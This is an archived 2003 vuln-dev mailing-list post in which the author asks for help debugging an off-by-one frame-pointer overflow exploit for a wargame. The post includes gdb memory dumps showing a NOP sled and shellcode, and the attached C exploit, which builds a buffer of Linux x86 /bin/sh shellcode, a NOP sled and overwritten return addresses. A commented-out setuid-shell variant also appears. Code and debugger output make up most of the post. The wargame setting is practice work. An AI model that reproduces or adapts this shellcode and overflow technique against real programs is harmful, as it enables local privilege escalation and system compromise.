Illegal Instruction and Frame pointer overwriting
From: joe (moj0e_at_terra.com.br)
Date: 09/24/03
- Previous message: Moran Zavdi: "Moozatech: WZFTPD Denial Of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 24 Sep 2003 09:19:14 -0300 To: vuln-dev@securityfocus.com
Hello! It is great to such a mailing list as this! It's not too hot and
not too cold!! Its just right!!
Anyway...
I am having a problem developing an exploit for a wargame.
The vuln is just like the one on:
http://www.phrack.org/phrack/55/P55-08
I even use the exploit provided since the vuln is almost identical
to the one on the wargame.
I am able to overwrite the last byte on EBP (I realize it adds 4 to it)
and make it point to an address that will take me to the NOPS.
From there it travels up the memory untill it hits a certain address
and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault).
It tries to execute
instruction 0xf798bfff which looks doesnt look right to me.
(I am using Mandrake 9.1 on a x86) The vuln was compiled with gcc v2.9
or something... the one that makes it possible to exploit this kind of
vuln. I am able to check execution flow by examining the memory (using
the command x in gdb).
So I know that I am actually going to where I want (or think I want) to go.
Any help is gratefully accepted! Attached is the exploit
Here is some gdb output for you to chew on:
(no debugging symbols found)...
(gdb) run `./xp15`
Breakpoint 1, 0x08048555 in main ()
(gdb) info reg esp
esp 0xbffff78c 0xbffff78c
(gdb) x 0xbffff78c
0xbffff78c: 0xbffff710
(gdb) x 0xbffff710
0xbffff710: 0x90909090
(gdb) c
Continuing.
Program received signal SIGILL, Illegal instruction.
0xbffff776 in ?? ()
(gdb) x 0xbffff776
0xbffff776: 0xf798bfff
(gdb) x/100 0xbffff700
0xbffff700: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff710: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff720: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff730: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff740: 0x90909090 0x90909090 0x90909090 0x24eb9090
0xbffff750: 0x891e8d5e 0xd2330b5e 0x89075689 0x1bb80f56
0xbffff760: 0x35123456 0x12345610 0x4006d57d 0x40155f50
0xbffff770: 0x40012780 0xbffff804 0xbffff798 0x40077eb2
0xbffff780: 0x40154360 0x08048660 0xbffff7a4 0xbffff710
0xbffff790: 0x88888888 0x40155f50 0xbffff788 0x08048551
0xbffff7a0: 0x08048660 0xbffff804 0xbffff7b8 0x400508d9
0xbffff7b0: 0x40031038 0x40155f50 0xbffff7d8 0x4003b7f7
0xbffff7c0: 0x00000002 0xbffff804 0xbffff810 0x40012c10
0xbffff7d0: 0x00000002 0x08048380 0x00000000 0x080483a1
0xbffff7e0: 0x080484b0 0x00000002 0xbffff804 0x080482e0
0xbffff7f0: 0x08048590 0x4000abf0 0xbffff7fc 0x40012de0
0xbffff800: 0x00000002 0xbffff947 0xbffff961 0x00000000
0xbffff810: 0xbffffa63 0xbffffa76 0xbffffa85 0xbffffa96
0xbffff820: 0xbffffaa8 0xbffffac0 0xbffffacb 0xbffffadb
0xbffff830: 0xbffffae9 0xbffffb03 0xbffffb14 0xbffffb1d
0xbffff840: 0xbffffcfb 0xbffffd0e 0xbffffd1c 0xbffffd3c
0xbffff850: 0xbffffd67 0xbffffd80 0xbffffdfb 0xbffffe0d
0xbffff860: 0xbffffe19 0xbffffe35 0xbffffe44 0xbffffe5c
0xbffff870: 0xbffffe6d 0xbffffe82 0xbffffe9d 0xbffffed2
0xbffff880: 0xbffffedd 0xbffffef2 0xbfffff09 0xbfffff11
(gdb)
(gdb)quit
[blurb@wargame]$ fortune
"The major difference between a thing that might go wrong
and a thing that cannot possibly go wrong is that when a
thing that cannot possibly go wrong goes wrong it usually
turns out to be impossible to get at or repair."
-- One of the laws of computers and programming revealed.
[blurb@wargame]$
#include <stdio.h>
#include <unistd.h>
char sc_linux[] =
/*"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x01"
"\xcd\x80"; */
// /*Original shell code....
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
main()
{
int i, j, t;
char buffer[1024];
bzero(&buffer, 1024);
for (i=0;i<=(252-sizeof(sc_linux)-20);i++)
{
buffer[i] = 0x90;
}
for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++)
{
buffer[i] = sc_linux[j];
}
for(t=0; t < 4;t++ ){
buffer[i++] = 0x10; //
buffer[i++] = 0xf7; // Address of our buffer
buffer[i++] = 0xff; //
buffer[i++] = 0xbf; //
}
for(t=0; t < 9; t++) {
buffer[i++] = 0x88; // overflowchar
}
printf("%s",buffer);
//execl("./15", "./15", buffer, NULL);
}
- Previous message: Moran Zavdi: "Moozatech: WZFTPD Denial Of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
